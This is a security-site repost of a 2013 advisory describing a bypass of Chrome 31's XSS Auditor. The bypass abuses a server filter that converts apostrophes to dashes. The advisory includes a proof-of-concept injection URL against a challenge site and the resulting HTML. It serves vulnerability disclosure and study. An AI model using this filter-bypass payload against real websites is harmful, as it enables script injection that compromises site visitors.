首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Google Chrome 31.0 Webkit Auditor Bypass
来源: 作者:Vila 发布时间:2013-09-25  
# Title: Chrome 31.0 Webkit XSS Auditor Bypass
# Product: Google Chrome
# Author: Rafay Baloch @rafaybaloch And PEPE Vila
# Company: Majorsecurity GMBH
# Website: Majorsecurity.com

============
Description
============

Chrome XSS Auditor is a client side XSS filter used by google chrome
to protect against XSS attacks. Chrome XSS filter has already been beaten
ltos of times, so we thought why don't we give a try.

============
Vulnerability
============

There is a certain criteria that needs to be met for this bypass, For this
bypass the server side filter should convert an aprostrophe ' to
dash -, which is a commonly known practice.

================
Proof of concept
================

The following is a challenge setup by a gentle man with a nick "Strong boi":

http://12342.site11.com/level2.php

The expected solution was to use a well known unfixed bug in chrome and
using both parameters a and b to execute the javascript. However, we
noticed a different behavior, when we injected an apostrophe. It was being
converted to - and hence yielding a valid syntax and executing the
javascript.


http://12342.site11.com/level2.php?a=%22%3E%3Cscript%3E'alert(0);%3C/script%3E

Output Source:

First search:<input type="text" name="a"
value="<script>1-alert(0);</script>"/><br>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IBM AIX 6.1 / 7.1 - Local root
·ZeroShell Remote Code Executio
·Raidsonic NAS Devices Unauthen
·Nodejs js-yaml load() Code Exe
·Share KM 1.0.19 - Remote Denia
·Astium Remote Code Execution
·SolarWinds Server and Applicat
·Blast XPlayer Local Buffer Ove
·MS13-071 Microsoft Windows The
·mod_accounting 0.5 Blind SQL I
·MS13-069 Microsoft Internet Ex
·Astium Remote Code Execution V
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved